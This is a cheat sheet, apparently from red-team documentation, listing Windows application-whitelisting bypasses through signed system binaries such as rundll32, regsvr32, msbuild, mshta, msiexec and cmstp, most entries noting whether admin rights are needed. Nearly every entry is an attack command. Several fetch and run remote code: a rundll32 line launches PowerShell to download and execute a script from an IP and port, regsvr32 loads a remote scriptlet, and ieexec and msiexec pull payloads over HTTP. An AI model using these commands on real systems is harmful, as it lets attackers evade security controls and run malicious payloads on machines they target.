Applock Bypass - Documentation

Link to this headingApplock Bypass

Link to this headingRundll32.exe

Requires admin: ?

rundll32.exe javascript:"..\\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('[http://ip:port/'](http://ip:port/'));"

rundll32 shell32.dll,Control\_RunDLL payload.dll

Link to this headingRegsvr32.exe

Requires admin: No Bypasses:

regsvr32 /s /n /u /i:[http://example.com/file.sct](http://example.com/file.sct) scrobj.dll

Link to this headingMsbuild.exe

No Admin

msbuild.exe pshell.xml

Link to this headingRegsvcs.exe

Requires admin: ?

regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll

Link to this headingRegasm.exe

Requires admin: ?

regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll

Link to this headingBginfo.exe

Requires admin: No

bginfo.exe bginfo.bgi /popup /nolicprompt

Link to this headingInstallUtil.exe

Requires admin: No

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

Link to this headingMSDT.exe

Requires admin: ?

Open .diagcab package

Link to this headingmshta.exe

Requires admin: No

mshta.exe evilfile.hta

Link to this headingExecute .Bat

Requires admin: No

cmd.exe /k < script.txt

Link to this headingExecute .PS1

Requires admin: No

Get-Content script.txt | iex

Link to this headingExecute .VBS

Requires admin: No

cscript.exe //E:vbscript script.txt

Link to this headingPresentationHost.exe

Requires admin: ?
https://raw.githubusercontent.com/subTee/ShmooCon-2015/master/ShmooCon-2015-Simple-WLEvasion.pdf

Link to this headingdfsvc.exe

Requires admin: ?

https://raw.githubusercontent.com/subTee/ShmooCon-2015/master/ShmooCon-2015-Simple-WLEvasion.pdf

Link to this headingIEExec.exe

Requires admin: ?

ieexec.exe http://x.x.x.x:8080/bypass.exe

Link to this headingcdb.exe

Requires admin: ?

cdb.exe -cf x64\_calc.wds -o notepad.exe

Link to this headingdnx.exe

Requires admin: ?

dnx.exe consoleapp

Link to this headingrcsi.exe

Requires admin: ?

rcsi.exe bypass.csx

Link to this headingcsi.exe

Requires admin: ?

https://web.archive.org/web/20161008143428/http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html

Link to this headingCPL loading location manipulation

Requires admin: No

Control.exe

Link to this headingmsxsl.exe

Requires admin: No

msxsl.exe customers.xml script.xsl

Link to this headingmsiexec.exe

Requires admin: ?

msiexec /quiet /i cmd.msi msiexec /q /i http://192.168.100.3/tmp/cmd.png

Link to this headingcmstp.exe

Requires admin: No

cmstp.exe /ni /s c:\\cmstp\\CorpVPN.inf

Link to this headingxwizard.exe

Requires admin: No

xwizard.exe argument1 argument2 DLL loading in same folder xwizard.dll

Link to this headingfsi.exe

Requires admin: No

fsi.exe c:\\folder\\d.fscript

Link to this headingodbcconf.exe

Requires admin: ?

odbcconf -f file.rsp